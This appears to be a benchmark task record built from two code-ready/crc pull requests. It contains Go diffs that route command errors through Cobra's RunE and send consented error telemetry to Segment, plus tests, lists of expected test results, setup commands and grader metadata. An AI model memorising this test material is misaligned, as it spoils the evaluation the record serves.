@@ -89,9 +88,8 @@ var daemonCmd = &cobra.Command{ ":6443": "192.168.127.2:6443", ":443": "192.168.127.2:443", }, - }, endpoints); err != nil { - exit.WithMessage(1, err.Error()) - } + }, endpoints) + return err }, } diff --git a/cmd/crc/cmd/delete.go b/cmd/crc/cmd/delete.go index 0abb8d699..48ac6f6ec 100644 --- a/cmd/crc/cmd/delete.go +++ b/cmd/crc/cmd/delete.go @@ -7,7 +7,6 @@ import ( "os" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/machine" "github.com/spf13/cobra" @@ -27,10 +26,8 @@ var deleteCmd = &cobra.Command{ Use: "delete", Short: "Delete the OpenShift cluster", Long: "Delete the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if err := runDelete(os.Stdout, newMachine(), clearCache, constants.MachineCacheDir, outputFormat != jsonFormat, globalForce, outputFormat); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runDelete(os.Stdout, newMachine(), clearCache, constants.MachineCacheDir, outputFormat != jsonFormat, globalForce, outputFormat) }, } diff --git a/cmd/crc/cmd/ip.go b/cmd/crc/cmd/ip.go index e7db5a68f..576178ac0 100644 --- a/cmd/crc/cmd/ip.go +++ b/cmd/crc/cmd/ip.go @@ -1,7 +1,6 @@ package cmd import ( - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/spf13/cobra" ) @@ -14,10 +13,8 @@ var ipCmd = &cobra.Command{ Use: "ip", Short: "Get IP address of the running OpenShift cluster", Long: "Get IP address of the running OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if err := runIP(args); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runIP(args) }, } diff --git a/cmd/crc/cmd/oc_env.go b/cmd/crc/cmd/oc_env.go index aea0177bc..09495bf92 100644 --- a/cmd/crc/cmd/oc_env.go +++ b/cmd/crc/cmd/oc_env.go @@ 
-4,7 +4,6 @@ import ( "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" @@ -18,10 +17,8 @@ var ocEnvCmd = &cobra.Command{ Use: "oc-env", Short: "Add the 'oc' executable to PATH", Long: `Add the OpenShift client executable 'oc' to PATH`, - Run: func(cmd *cobra.Command, args []string) { - if err := runOcEnv(args); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runOcEnv(args) }, } diff --git a/cmd/crc/cmd/podman_env.go b/cmd/crc/cmd/podman_env.go index e422ab619..ad37ea0f4 100644 --- a/cmd/crc/cmd/podman_env.go +++ b/cmd/crc/cmd/podman_env.go @@ -1,10 +1,10 @@ package cmd import ( + "errors" "fmt" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/output" "github.com/code-ready/crc/pkg/os/shell" "github.com/spf13/cobra" @@ -14,17 +14,13 @@ var podmanEnvCmd = &cobra.Command{ Use: "podman-env", Short: "Setup podman environment", Long: `Setup environment for 'podman' executable to access podman on CRC VM`, - Run: func(cmd *cobra.Command, args []string) { - if err := runPodmanEnv(args); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + // See issue #961; Currently does not work on Windows in combination with the CRC vm. + return errors.New("currently not supported") }, } -func runPodmanEnv(args []string) error { - // See issue #961; Currently does not work on Windows in combination with the CRC vm. 
- exit.WithMessage(1, "Currently not supported.") - +func RunPodmanEnv(args []string) error { userShell, err := shell.GetShell(forceShell) if err != nil { return fmt.Errorf("Error running the podman-env command: %s", err.Error()) diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index b300b358b..f9ba2491e 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -3,12 +3,12 @@ package cmd import ( "fmt" "io/ioutil" + "os" "strings" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/crc/pkg/crc/network" @@ -22,16 +22,15 @@ var rootCmd = &cobra.Command{ Use: commandName, Short: descriptionShort, Long: descriptionLong, - PersistentPreRun: func(cmd *cobra.Command, args []string) { - runPrerun() + PersistentPreRunE: func(cmd *cobra.Command, args []string) error { + return runPrerun() }, Run: func(cmd *cobra.Command, args []string) { runRoot() _ = cmd.Help() }, - PersistentPostRun: func(cmd *cobra.Command, args []string) { - runPostrun() - }, + SilenceUsage: true, + SilenceErrors: true, } var ( @@ -61,18 +60,22 @@ func init() { rootCmd.PersistentFlags().StringVar(&logging.LogLevel, "log-level", constants.DefaultLogLevel, "log level (e.g. 
\"debug | info | warn | error\")") } -func runPrerun() { +func runPrerun() error { // Setting up logrus logging.InitLogrus(logging.LogLevel, constants.LogFilePath) - setProxyDefaults() + if err := setProxyDefaults(); err != nil { + return err + } for _, str := range defaultVersion().lines() { logging.Debugf(str) } + return nil } func runPostrun() { logging.CloseLogging() + segmentClient.Close() } func runRoot() { @@ -80,9 +83,14 @@ func runRoot() { } func Execute() { + attachMiddleware([]string{}, rootCmd) + if err := rootCmd.Execute(); err != nil { - logging.Fatal(err) + runPostrun() + _, _ = fmt.Fprintln(os.Stderr, err.Error()) + os.Exit(1) } + runPostrun() } func checkIfMachineMissing(client machine.Client) error { @@ -96,7 +104,7 @@ func checkIfMachineMissing(client machine.Client) error { return nil } -func setProxyDefaults() { +func setProxyDefaults() error { httpProxy := config.Get(cmdConfig.HTTPProxy).AsString() httpsProxy := config.Get(cmdConfig.HTTPSProxy).AsString() noProxy := config.Get(cmdConfig.NoProxy).AsString() @@ -104,12 +112,12 @@ func setProxyDefaults() { proxyCAData, err := getProxyCAData(proxyCAFile) if err != nil { - exit.WithMessage(1, fmt.Sprintf("not able to read proxyCAFile %s: %v", proxyCAFile, err.Error())) + return fmt.Errorf("not able to read proxyCAFile %s: %v", proxyCAFile, err.Error()) } proxyConfig, err := network.NewProxyDefaults(httpProxy, httpsProxy, noProxy, proxyCAData) if err != nil { - exit.WithMessage(1, err.Error()) + return err } if proxyConfig.IsEnabled() { @@ -117,6 +125,7 @@ func setProxyDefaults() { proxyConfig.HTTPSProxyForDisplay(), proxyConfig.GetNoProxyString(), proxyCAFile) proxyConfig.ApplyToEnvironment() } + return nil } func getProxyCAData(proxyCAFile string) (string, error) { @@ -157,3 +166,27 @@ func newMachineWithConfig(config crcConfig.Storage) machine.Client { func addForceFlag(cmd *cobra.Command) { cmd.PersistentFlags().BoolVarP(&globalForce, "force", "f", false, "Forcefully perform this action") } + 
+func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { + return func(cmd *cobra.Command, args []string) error { + if err := input(cmd, args); err != nil { + if serr := segmentClient.Upload(fullCmd, err); serr != nil { + fmt.Println(serr.Error()) + } + return err + } + return nil + } +} + +func attachMiddleware(names []string, cmd *cobra.Command) { + if cmd.HasSubCommands() { + for _, command := range cmd.Commands() { + attachMiddleware(append(names, cmd.Name()), command) + } + } else if cmd.RunE != nil { + fullCmd := strings.Join(append(names, cmd.Name()), " ") + src := cmd.RunE + cmd.RunE = executeWithLogging(fullCmd, src) + } +} diff --git a/cmd/crc/cmd/setup.go b/cmd/crc/cmd/setup.go index f6b356ce5..d8b5ace93 100644 --- a/cmd/crc/cmd/setup.go +++ b/cmd/crc/cmd/setup.go @@ -8,7 +8,6 @@ import ( cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/preflight" "github.com/spf13/cobra" ) @@ -23,13 +22,11 @@ var setupCmd = &cobra.Command{ Use: "setup", Short: "Set up prerequisites for the OpenShift cluster", Long: "Set up local virtualization and networking infrastructure for the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if err := viper.BindFlagSet(cmd.Flags()); err != nil { - exit.WithMessage(1, err.Error()) - } - if err := runSetup(args); err != nil { - exit.WithMessage(1, err.Error()) + return err } + return runSetup(args) }, } diff --git a/cmd/crc/cmd/start.go b/cmd/crc/cmd/start.go index 90c95d202..565dcc54f 100644 --- a/cmd/crc/cmd/start.go +++ b/cmd/crc/cmd/start.go @@ -11,7 +11,6 @@ import ( cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" "github.com/code-ready/crc/pkg/crc/cluster" "github.com/code-ready/crc/pkg/crc/constants" - 
"github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/logging" "github.com/code-ready/crc/pkg/crc/machine" @@ -43,16 +42,14 @@ var startCmd = &cobra.Command{ Use: "start", Short: "Start the OpenShift cluster", Long: "Start the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { + RunE: func(cmd *cobra.Command, args []string) error { if err := viper.BindFlagSet(cmd.Flags()); err != nil { - exit.WithMessage(1, err.Error()) + return err } if err := renderStartResult(runStart(args)); err != nil { - if serr := segmentClient.Upload(err); serr != nil { - fmt.Println(serr.Error()) - } - exit.WithMessage(1, err.Error()) + return err } + return nil }, } diff --git a/cmd/crc/cmd/status.go b/cmd/crc/cmd/status.go index e9f8c60ef..10b05b555 100644 --- a/cmd/crc/cmd/status.go +++ b/cmd/crc/cmd/status.go @@ -8,7 +8,6 @@ import ( "text/tabwriter" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/machine" "github.com/docker/go-units" "github.com/spf13/cobra" @@ -23,10 +22,8 @@ var statusCmd = &cobra.Command{ Use: "status", Short: "Display status of the OpenShift cluster", Long: "Show details about the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if err := runStatus(os.Stdout, newMachine(), constants.MachineCacheDir, outputFormat); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runStatus(os.Stdout, newMachine(), constants.MachineCacheDir, outputFormat) }, } diff --git a/cmd/crc/cmd/stop.go b/cmd/crc/cmd/stop.go index cf1cce9f4..61d533123 100644 --- a/cmd/crc/cmd/stop.go +++ b/cmd/crc/cmd/stop.go @@ -6,7 +6,6 @@ import ( "io" "os" - "github.com/code-ready/crc/pkg/crc/exit" "github.com/code-ready/crc/pkg/crc/input" "github.com/code-ready/crc/pkg/crc/machine" "github.com/code-ready/machine/libmachine/state" @@ -23,10 +22,8 @@ var stopCmd = 
&cobra.Command{ Use: "stop", Short: "Stop the OpenShift cluster", Long: "Stop the OpenShift cluster", - Run: func(cmd *cobra.Command, args []string) { - if renderErr := runStop(os.Stdout, newMachine(), outputFormat != jsonFormat, globalForce, outputFormat); renderErr != nil { - exit.WithMessage(1, renderErr.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runStop(os.Stdout, newMachine(), outputFormat != jsonFormat, globalForce, outputFormat) }, } diff --git a/cmd/crc/cmd/version.go b/cmd/crc/cmd/version.go index bb770709b..2d8a414ce 100644 --- a/cmd/crc/cmd/version.go +++ b/cmd/crc/cmd/version.go @@ -6,7 +6,6 @@ import ( "os" "github.com/code-ready/crc/pkg/crc/constants" - "github.com/code-ready/crc/pkg/crc/exit" crcversion "github.com/code-ready/crc/pkg/crc/version" "github.com/spf13/cobra" ) @@ -20,10 +19,8 @@ var versionCmd = &cobra.Command{ Use: "version", Short: "Print version information", Long: "Print version information", - Run: func(cmd *cobra.Command, args []string) { - if err := runPrintVersion(os.Stdout, defaultVersion(), outputFormat); err != nil { - exit.WithMessage(1, err.Error()) - } + RunE: func(cmd *cobra.Command, args []string) error { + return runPrintVersion(os.Stdout, defaultVersion(), outputFormat) }, } diff --git a/pkg/crc/exit/atexit.go b/pkg/crc/exit/atexit.go deleted file mode 100644 index 0c657ec34..000000000 --- a/pkg/crc/exit/atexit.go +++ /dev/null @@ -1,19 +0,0 @@ -package exit - -import ( - "fmt" - "os" - - "github.com/code-ready/crc/pkg/crc/output" -) - -// WithMessage prints the specified message and then exits the program with the specified exit code. -// If the exit code is 0, the message is prints to stdout, otherwise to stderr. 
-func WithMessage(code int, text string, args ...interface{}) { - if code == 0 { - _, _ = output.Fout(os.Stdout, fmt.Sprintf(text, args...)) - } else { - _, _ = output.Fout(os.Stderr, fmt.Sprintf(text, args...)) - } - os.Exit(code) -} diff --git a/pkg/crc/segment/segment.go b/pkg/crc/segment/segment.go index 25c612184..254dfb386 100644 --- a/pkg/crc/segment/segment.go +++ b/pkg/crc/segment/segment.go @@ -22,8 +22,12 @@ type Client struct { } func NewClient(config *crcConfig.Config) (*Client, error) { - telemetryFilePath := filepath.Join(constants.GetHomeDir(), ".redhat", "anonymousId") + return newCustomClient(config, + filepath.Join(constants.GetHomeDir(), ".redhat", "anonymousId"), + analytics.DefaultEndpoint) +} +func newCustomClient(config *crcConfig.Config, telemetryFilePath, segmentEndpoint string) (*Client, error) { client, err := analytics.NewWithConfig("cvpHsNcmGCJqVzf6YxrSnVlwFSAZaYtp", analytics.Config{ DefaultContext: &analytics.Context{ App: analytics.AppInfo{ @@ -31,28 +35,38 @@ func NewClient(config *crcConfig.Config) (*Client, error) { Version: version.GetCRCVersion(), }, }, + Endpoint: segmentEndpoint, + Logger: &loggingAdapter{}, }) if err != nil { - return &Client{}, err + return nil, err } - return &Client{segmentClient: client, config: config, telemetryFilePath: telemetryFilePath}, nil + return &Client{ + segmentClient: client, + config: config, + telemetryFilePath: telemetryFilePath, + }, nil +} + +func (c *Client) Close() error { + return c.segmentClient.Close() } -func (c *Client) Upload(err error) error { - defer c.segmentClient.Close() +func (c *Client) Upload(action string, err error) error { if !c.config.Get(config.ConsentTelemetry).AsBool() { return nil } - logging.Info("Uploading the error to segment") + logging.Debug("Uploading the error to segment") anonymousID, uerr := getUserIdentity(c.telemetryFilePath) if uerr != nil { return uerr } - t := analytics.NewTraits() - t = setError(t, err) + t := analytics.NewTraits(). 
+ Set("action", action). + Set("error", err.Error()) return c.segmentClient.Enqueue(analytics.Identify{ AnonymousId: anonymousID, @@ -80,6 +94,12 @@ func getUserIdentity(telemetryFilePath string) (string, error) { return strings.TrimSpace(string(id)), nil } -func setError(t analytics.Traits, err error) analytics.Traits { - return t.Set("error", err.Error()) +type loggingAdapter struct{} + +func (l *loggingAdapter) Logf(format string, args ...interface{}) { + logging.Infof(format, args...) +} + +func (l *loggingAdapter) Errorf(format string, args ...interface{}) { + logging.Errorf(format, args...) }
Intercept errors and send to segment for all commands * Remove most of os.Exit in the middle of the code. This is needed to send errors to segment. * Use RunE instead of Run. postRun() is now correctly called after each method. Even in case of an error. * Introduce a segment middleware for all commands (except config because it lives in a separate pkg - to be changed) * Log the error and the command used in segment. * Refactor segment tests.
**Title** Improve CLI error handling and enable telemetry for all commands **Problem** The CLI terminated processes directly with exit calls, preventing graceful shutdown, post‑run actions, and consistent telemetry collection. Errors were not propagated to the Cobra framework, and the segment middleware was only applied to a subset of commands. **Root Cause** Direct use of a custom exit helper bypassed Cobra’s error handling path and blocked deferred cleanup and telemetry hooks. **Fix / Expected Behavior** - Convert command execution to return errors so Cobra can manage exit codes. - Replace the exit helper with standard error propagation throughout all commands. - Ensure pre‑run and post‑run hooks are executed even when a command fails. - Attach a middleware layer that captures any command error and uploads it to the telemetry service. - Close the telemetry client cleanly after command execution. - Propagate configuration‑related errors (e.g., proxy defaults) through the error path instead of exiting abruptly. **Risk & Validation** - Verify that all commands still exit with the correct status codes on success and failure. - Confirm that telemetry events are sent for error cases and that the client is properly closed. - Run the full test suite and perform manual smoke‑tests of the primary CLI commands to ensure no regression in functionality.
1,794
code-ready/crc
diff --git a/pkg/crc/segment/segment_test.go b/pkg/crc/segment/segment_test.go index 2f7acce08..cdf4faa22 100644 --- a/pkg/crc/segment/segment_test.go +++ b/pkg/crc/segment/segment_test.go @@ -1,10 +1,8 @@ package segment import ( - "bytes" "encoding/json" "errors" - "io" "io/ioutil" "net/http" "net/http/httptest" @@ -12,15 +10,13 @@ import ( "path/filepath" "testing" + cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" - "github.com/segmentio/analytics-go" + "github.com/code-ready/crc/pkg/crc/logging" + "github.com/code-ready/crc/pkg/crc/version" "github.com/stretchr/testify/require" ) -const ( - ConsentTelemetry = "consent-telemetry" -) - type segmentResponse struct { Batch []struct { AnonymousID string `json:"anonymousId"` @@ -47,21 +43,13 @@ func mockServer() (chan []byte, *httptest.Server) { done := make(chan []byte, 1) server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { - buf := bytes.NewBuffer(nil) - io.Copy(buf, r.Body) // nolint - - var v interface{} - err := json.Unmarshal(buf.Bytes(), &v) + defer r.Body.Close() + bin, err := ioutil.ReadAll(r.Body) if err != nil { - panic(err) + logging.Error(err) + return } - - b, err := json.MarshalIndent(v, "", " ") - if err != nil { - panic(err) - } - - done <- b + done <- bin })) return done, server @@ -70,7 +58,11 @@ func mockServer() (chan []byte, *httptest.Server) { func newTestConfig(value bool) (*crcConfig.Config, error) { storage := crcConfig.NewEmptyInMemoryStorage() config := crcConfig.New(storage) - config.AddSetting(ConsentTelemetry, value, crcConfig.ValidateBool, crcConfig.SuccessfullyApplied) + cmdConfig.RegisterSettings(config) + + if _, err := config.Set(cmdConfig.ConsentTelemetry, value); err != nil { + return nil, err + } return config, nil } @@ -79,17 +71,6 @@ func TestClientUploadWithConsent(t *testing.T) { defer server.Close() defer close(body) - client, err := analytics.NewWithConfig("dummykey", 
analytics.Config{ - DefaultContext: &analytics.Context{ - App: analytics.AppInfo{ - Name: "crc", - Version: "1.20.0", - }, - }, - Endpoint: server.URL, - }) - require.NoError(t, err) - dir, err := ioutil.TempDir("", "cfg") require.NoError(t, err) defer os.RemoveAll(dir) @@ -97,22 +78,22 @@ func TestClientUploadWithConsent(t *testing.T) { config, err := newTestConfig(true) require.NoError(t, err) - c := &Client{segmentClient: client, config: config, telemetryFilePath: filepath.Join(dir, "telemetry")} + c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) + require.NoError(t, err) - require.NoError(t, c.Upload(errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Close()) - s := segmentResponse{} select { - case x, ok := <-body: - if ok { - err = json.Unmarshal(x, &s) - require.NoError(t, err) - } + case x := <-body: + s := segmentResponse{} + require.NoError(t, json.Unmarshal(x, &s)) + require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") + require.Equal(t, s.Context.App.Name, "crc") + require.Equal(t, s.Context.App.Version, version.GetCRCVersion()) default: + require.Fail(t, "server should receive data") } - require.Equal(t, s.Batch[0].Traits.Error, "an error occurred") - require.Equal(t, s.Context.App.Name, "crc") - require.Equal(t, s.Context.App.Version, "1.20.0") } func TestClientUploadWithOutConsent(t *testing.T) { @@ -120,17 +101,6 @@ func TestClientUploadWithOutConsent(t *testing.T) { defer server.Close() defer close(body) - client, err := analytics.NewWithConfig("dummykey", analytics.Config{ - DefaultContext: &analytics.Context{ - App: analytics.AppInfo{ - Name: "crc", - Version: "1.20.0", - }, - }, - Endpoint: server.URL, - }) - require.NoError(t, err) - dir, err := ioutil.TempDir("", "cfg") require.NoError(t, err) defer os.RemoveAll(dir) @@ -138,19 +108,15 @@ func TestClientUploadWithOutConsent(t *testing.T) { config, err := newTestConfig(false) 
require.NoError(t, err) - c := &Client{segmentClient: client, config: config, telemetryFilePath: filepath.Join(dir, "telemetry")} + c, err := newCustomClient(config, filepath.Join(dir, "telemetry"), server.URL) + require.NoError(t, err) - require.NoError(t, c.Upload(errors.New("an error occurred"))) + require.NoError(t, c.Upload("start", errors.New("an error occurred"))) + require.NoError(t, c.Close()) - s := segmentResponse{} select { - case x, ok := <-body: - if ok { - err = json.Unmarshal(x, &s) - require.NoError(t, err) - } + case <-body: + require.Fail(t, "server should not receive data") default: } - - require.Len(t, s.Batch, 0) }
[ "TestClientUploadWithConsent", "TestClientUploadWithOutConsent" ]
[ "TestApi", "TestSetconfigApi", "TestGetconfigApi", "TestGetClusterOperatorsStatus", "TestGetClusterOperatorsStatusProgressing", "TestGetClusterOperatorStatus", "TestGetClusterOperatorStatusNotFound", "TestSuccessfullyApplied", "TestViperConfigUnknown", "TestViperConfigSetAndGet", "TestViperConfigUnsetAndGet", "TestViperConfigSetReloadAndGet", "TestViperConfigLoadDefaultValue", "TestViperConfigBindFlagSet", "TestViperConfigCastSet", "TestCannotSetWithWrongType", "TestCannotGetWithWrongType", "TestRetryAfter", "TestRetryAfterFailure", "TestRetryAfterSlowFailure", "TestRetryAfterMaxAttempts", "TestRetryAfterSuccessAfterFailures", "TestMultiErrorString", "TestCertificateAuthority", "TestUnmarshalMarshal", "TestUse", "TestExtract", "TestVersionCheck", "TestValidateProxyURL", "TestRunCommand", "TestRunCommandWithoutContextAndCluster", "TestCountConfigurationOptions", "TestCountPreflights", "TestCheckPreflight", "TestSkipPreflight", "TestFixPreflight", "TestWarnPreflight", "TestCheckAppArmor", "TestFixAppArmor", "TestCleanupAppArmor", "TestNewKeyPair", "TestRunner", "TestGenerateSSHKey", "TestSystemd", "TestSystemdStatuses", "TestUncompress", "TestUnCompressBundle", "TestReplaceEnv", "TestAddEnv", "TestFileContentFuncs", "TestParseOsRelease", "TestParseLine", "TestDetectBash", "TestDetectFish", "TestUnknownShell" ]
Method: Client.Upload(self, action string, err error) Location: pkg/crc/segment/segment.go Inputs: action – a string describing the command that triggered the error (e.g., "start"); err – the error to be reported (non‑nil). The client must have telemetry consent enabled; otherwise the call is a no‑op. Outputs: error – returns any error from generating the anonymous ID or from enqueuing the analytics event; nil on success. Method: Client.Close(self) Location: pkg/crc/segment/segment.go Inputs: none. Closes the underlying Segment analytics client, releasing resources. Outputs: error – the result of the underlying client’s Close method (if any). Function: newCustomClient(config *crcConfig.Config, telemetryFilePath string, segmentEndpoint string) Location: pkg/crc/segment/segment.go Inputs: config – CRC configuration object (used to read telemetry consent); telemetryFilePath – path where the anonymous ID is stored/retrieved; segmentEndpoint – custom Segment endpoint (used in tests to point to a mock server). Outputs: (*Client, error) – returns a fully‑initialized Client ready for Upload/Close, or an error if the Segment client cannot be created. Description: Constructs a Segment client with the provided endpoint and config, wiring up logging and telemetry handling. It is used by tests to inject a mock server URL.
Apache-2.0
{ "base_image_name": "go_1.19.13", "install": [ "export DEBIAN_FRONTEND=noninteractive && apt-get update -qq && apt-get install -y -qq golang", "export GOPATH=$HOME/go && export GOCACHE=$HOME/.cache/go-build && export XDG_CACHE_HOME=$HOME/.cache && export HOME=/tmp && mkdir -p $GOCACHE $HOME", "go mod download" ], "log_parser": "parse_log_gotest", "test_cmd": "make test" }
{ "num_modified_files": 18, "num_modified_lines": 128, "pr_author": "guillaumerose", "pr_labels": [ "approved", "lgtm" ], "llm_metadata": { "code": "B2", "code_quality": null, "confidence": 0.88, "detected_issues": { "B1": false, "B2": true, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "hard", "external_urls": [], "intent_completeness": "partial", "patch": null, "pr_categories": [ "integration_feat" ], "reason": null, "reasoning": "The issue asks to intercept errors, remove os.Exit calls, use RunE, and add segment middleware, but the provided tests expect new functions (newCustomClient, Upload taking an action string) and configuration registration that are not mentioned in the description. This mismatch indicates implicit naming expectations in the tests. Therefore the task is not cleanly solvable as‑is and falls under B2 (implicit naming).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests require a newCustomClient constructor and an Upload method that accepts an action string, which are not specified in the issue.", "Tests import cmdConfig.RegisterSettings and expect config to have a ConsentTelemetry setting registered, which the issue does not mention." 
], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
667a4164481ca9271b424d51775f75baed69243e
2020-12-24 09:49:29
openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1801#" title="Author self-approved">anjannath</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [anjannath] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} --> openshift-ci-robot: [APPROVALNOTIFIER] This PR is **APPROVED** This pull-request has been approved by: *<a href="https://github.com/code-ready/crc/pull/1801#" title="Author self-approved">anjannath</a>*, *<a href="https://github.com/code-ready/crc/pull/1801#pullrequestreview-562427683" title="Approved">cfergeau</a>* The full list of commands accepted by this bot can be found [here](https://go.k8s.io/bot-commands?repo=code-ready%2Fcrc). The pull request process is described [here](https://git.k8s.io/community/contributors/guide/owners.md#the-code-review-process) <details > Needs approval from an approver in each of these files: - ~~[OWNERS](https://github.com/code-ready/crc/blob/master/OWNERS)~~ [anjannath,cfergeau] Approvers can indicate their approval by writing `/approve` in a comment Approvers can cancel approval by writing `/approve cancel` in a comment </details> <!-- META={"approvers":[]} -->
code-ready__crc-1801
diff --git a/cmd/crc/cmd/root.go b/cmd/crc/cmd/root.go index 36e7a13b2..1c2b96adf 100644 --- a/cmd/crc/cmd/root.go +++ b/cmd/crc/cmd/root.go @@ -5,6 +5,7 @@ import ( "io/ioutil" "os" "strings" + "time" cmdConfig "github.com/code-ready/crc/cmd/crc/cmd/config" crcConfig "github.com/code-ready/crc/pkg/crc/config" @@ -175,13 +176,12 @@ func addForceFlag(cmd *cobra.Command) { func executeWithLogging(fullCmd string, input func(cmd *cobra.Command, args []string) error) func(cmd *cobra.Command, args []string) error { return func(cmd *cobra.Command, args []string) error { logging.Debugf("Running '%s'", fullCmd) - if err := input(cmd, args); err != nil { - if serr := segmentClient.Upload(fullCmd, err); serr != nil { - logging.Debugf("Cannot send data to telemetry: %v", serr) - } - return err + startTime := time.Now() + err := input(cmd, args) + if serr := segmentClient.Upload(fullCmd, time.Since(startTime), err); serr != nil { + logging.Debugf("Cannot send data to telemetry: %v", serr) } - return nil + return err } } diff --git a/pkg/crc/preflight/preflight_checks_network_linux.go b/pkg/crc/preflight/preflight_checks_network_linux.go index bc78d6802..ca22b3ea9 100644 --- a/pkg/crc/preflight/preflight_checks_network_linux.go +++ b/pkg/crc/preflight/preflight_checks_network_linux.go @@ -72,22 +72,27 @@ server=/crc.testing/192.168.130.11 dns=dnsmasq ` - crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") - crcNetworkManagerDispatcherConfig = `#!/bin/sh + crcNetworkManagerOldDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "pre-up.d", "99-crc.sh") + crcNetworkManagerDispatcherPath = filepath.Join(crcNetworkManagerRootPath, "dispatcher.d", "99-crc.sh") + crcNetworkManagerDispatcherConfig = `#!/bin/sh # This is a NetworkManager dispatcher script to configure split DNS for # the 'crc' libvirt network. 
-# The corresponding crc bridge is recreated each time the system reboots, so -# it cannot be configured permanently through NetworkManager. -# Changing DNS settings with nmcli requires the connection to go down/up, -# so we directly make the change using resolvectl +# +# The corresponding crc bridge is not created through NetworkManager, so +# it cannot be configured permanently through NetworkManager. We make the +# change directly using resolvectl instead. +# +# NetworkManager will overwrite this resolvectl configuration every time a +# network connection goes up/down, so we run this script on each of these events +# to restore our settings. This is a NetworkManager bug which is fixed in +# version 1.26.6 by this commit: +# https://cgit.freedesktop.org/NetworkManager/NetworkManager/commit/?id=ee4e679bc7479de42780ebd8e3a4d74afa2b2ebe export LC_ALL=C -if [ "$1" = crc ]; then - resolvectl domain "$1" ~testing - resolvectl dns "$1" 192.168.130.11 - resolvectl default-route "$1" false -fi +resolvectl domain crc ~testing +resolvectl dns crc 192.168.130.11 +resolvectl default-route crc false exit 0 ` @@ -266,6 +271,10 @@ func checkCrcNetworkManagerDispatcherFile() error { func fixCrcNetworkManagerDispatcherFile() error { logging.Debug("Fixing NetworkManager dispatcher configuration") + + // Remove dispatcher script which was used in crc 1.20 - it's been moved to a new location + _ = removeNetworkManagerConfigFile(crcNetworkManagerOldDispatcherPath) + err := fixNetworkManagerConfigFile(crcNetworkManagerDispatcherPath, 